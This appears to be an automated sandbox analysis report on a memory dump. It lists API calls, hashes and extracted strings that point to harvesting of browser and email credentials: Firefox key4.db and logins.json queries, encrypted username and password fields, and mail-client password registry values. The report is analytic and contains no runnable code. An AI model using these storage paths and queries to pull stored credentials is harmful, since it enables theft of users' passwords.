                                                                                                                                                                                     • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                                                                                    • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                                                    • API String ID: 4171719235-3943159138
                                                                                                                                                                                    • Opcode ID: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                                                                                                    • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                                                                                                    • Opcode Fuzzy Hash: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                                                                                                    • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                                                                                                    • GetDC.USER32 ref: 004104E2
                                                                                                                                                                                    • strlen.MSVCRT ref: 00410522
                                                                                                                                                                                    • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                                                                                                    • sprintf.MSVCRT ref: 00410640
                                                                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                                                    • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                    • API String ID: 1703216249-3046471546
                                                                                                                                                                                    • Opcode ID: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                                                                                                    • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                                                                                                    • Opcode Fuzzy Hash: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004024F5
                                                                                                                                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,?,?,?,7639E430,?,00000000), ref: 00402533
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscpy$QueryValuememset
                                                                                                                                                                                    • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                                                    • API String ID: 168965057-606283353
                                                                                                                                                                                    • Opcode ID: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                                                                                                    • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00402869
                                                                                                                                                                                      • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,7639E430,?,00000000), ref: 004028A3
                                                                                                                                                                                      • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,7639E430,?,00000000), ref: 0040297B
                                                                                                                                                                                      • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                                                                                                    • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                                                                                    • API String ID: 1497257669-167382505
                                                                                                                                                                                    • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                                                                    • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                                                                                                                    • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                                                                    • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                                                                    • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                                                                    • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                                                                                                    • memset.MSVCRT ref: 0040128E
                                                                                                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2998058495-0
                                                                                                                                                                                    • Opcode ID: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                                                                                                    • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                                                                                                    • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                                                                                                                    • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                                                                                                                    • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                                                                                                                    • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                                                                                                                    • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcmp$memcpy
                                                                                                                                                                                    • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                                                                                    • API String ID: 231171946-2189169393
                                                                                                                                                                                    • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                                                    • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                    • API String ID: 633282248-1996832678
                                                                                                                                                                                    • Opcode ID: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                                                                                                    • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00406782
                                                                                                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                                                                                                                    • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                                                                                                    • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                                                                                                    • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                                                                                                                                                    • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                                                                                                    • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                                                                                                    • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                                                                                                    • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                                                                                                    • key4.db, xrefs: 00406756
                                                                                                                                                                                    • , xrefs: 00406834
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memcmp$memsetstrlen
                                                                                                                                                                                    • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                                                                    • API String ID: 3614188050-3983245814
                                                                                                                                                                                    • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                                                    • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                                                                                                                    • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040A973
                                                                                                                                                                                    • memset.MSVCRT ref: 0040A996
                                                                                                                                                                                    • memset.MSVCRT ref: 0040A9AC
                                                                                                                                                                                    • memset.MSVCRT ref: 0040A9BC
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040A9F0
                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000, nowrap), ref: 0040AA37
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040AABE
                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040AAED
                                                                                                                                                                                      • Part of subcall function 00410FD3: sprintf.MSVCRT ref: 00410FF7
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 0040AAD2
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040AB21
                                                                                                                                                                                      • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                      • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,761F0A60,00000000,?,?,0040A7BE,00000001,0044CBC0,761F0A60), ref: 00406D4D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                                                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                    • API String ID: 710961058-601624466
                                                                                                                                                                                    • Opcode ID: c33c3296b7e77e76534675bd69894b8e30877f2258b439036e8e249278821d93
                                                                                                                                                                                    • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                                                                                                                                                    • Opcode Fuzzy Hash: c33c3296b7e77e76534675bd69894b8e30877f2258b439036e8e249278821d93
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: sprintf$memset$_mbscpy
                                                                                                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                    • API String ID: 3402215030-3842416460
                                                                                                                                                                                    • Opcode ID: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                                                                                                    • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                                                                                                    • Opcode Fuzzy Hash: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
APIs
  • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
  • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
  • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
  • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
  • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
  • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
  • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
  • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
• strlen.MSVCRT ref: 0040F139
• strlen.MSVCRT ref: 0040F147
• memset.MSVCRT ref: 0040F187
• strlen.MSVCRT ref: 0040F196
• strlen.MSVCRT ref: 0040F1A4
• memset.MSVCRT ref: 0040F1EA
• strlen.MSVCRT ref: 0040F1F9
• strlen.MSVCRT ref: 0040F207
• _strcmpi.MSVCRT ref: 0040F2B2
• _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
• _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
  • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
• String ID: logins.json$none$signons.sqlite$signons.txt
• API String ID: 2003275452-3138536805
• Opcode ID: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
• Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
• Opcode Fuzzy Hash: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
• Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
APIs
• memset.MSVCRT ref: 0040C3F7
• GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
• strrchr.MSVCRT ref: 0040C417
• _mbscat.MSVCRT ref: 0040C431
• _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
• _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
• GetWindowPlacement.USER32(?,?), ref: 0040C50C
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
• String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
• API String ID: 1012775001-1343505058
• Opcode ID: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
• Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
• Opcode Fuzzy Hash: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
• Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
APIs
• memset.MSVCRT ref: 00444612
  • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
• strlen.MSVCRT ref: 0044462E
• memset.MSVCRT ref: 00444668
• memset.MSVCRT ref: 0044467C
• memset.MSVCRT ref: 00444690
• memset.MSVCRT ref: 004446B6
  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
  • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
• memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
• memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
• memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
• _mbscpy.MSVCRT(?,?), ref: 00444812
• memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
• memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memcpymemset$strlen$_mbscpy
• String ID: salu
• API String ID: 3691931180-4177317985
